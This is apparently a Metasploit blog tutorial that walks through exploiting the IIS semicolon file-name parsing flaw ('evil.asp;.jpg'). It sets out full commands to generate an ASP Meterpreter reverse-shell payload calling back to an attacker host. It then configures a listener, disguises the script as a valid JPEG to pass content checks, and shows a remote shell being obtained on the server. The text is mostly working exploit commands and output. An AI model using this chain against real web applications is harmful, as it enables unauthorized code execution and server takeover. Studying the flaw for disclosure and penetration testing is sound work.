Exploiting Microsoft IIS with Metasploit

As of this afternoon, the msfencode command has the ability to emit ASP scripts that execute Metasploit payloads. This can be used to exploit the currently-unpatched file name parsing bug feature in Microsoft IIS. This flaw allows a user who can upload a "safe" file extension (jpg, png, etc) to upload an ASP script and force it to execute on the web server. The bug occurs when a file name is specified in the form of "evil.asp;.jpg" -- the application checks the file extension and sees "jpg", but the IIS server will stop parsing at the first ";" and sees "asp". The result is trivial code execution on any IIS server that allows users to choose the file name of their uploaded attachment.

For the following example, assume we have a web application that allows users to upload image files to the server. To complicate things, lets also assume that the application checks the file content to ensure that the uploaded file is a valid image. To exploit this, we need to generate an ASP script that drops a Meterpreter payload and configure a msfconsole instance to handle the session.

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Now we need to configure msfconsole to accept the incoming connection:

$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

To avoid the image content validator, we will prepend a valid JPG image to our ASP script:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service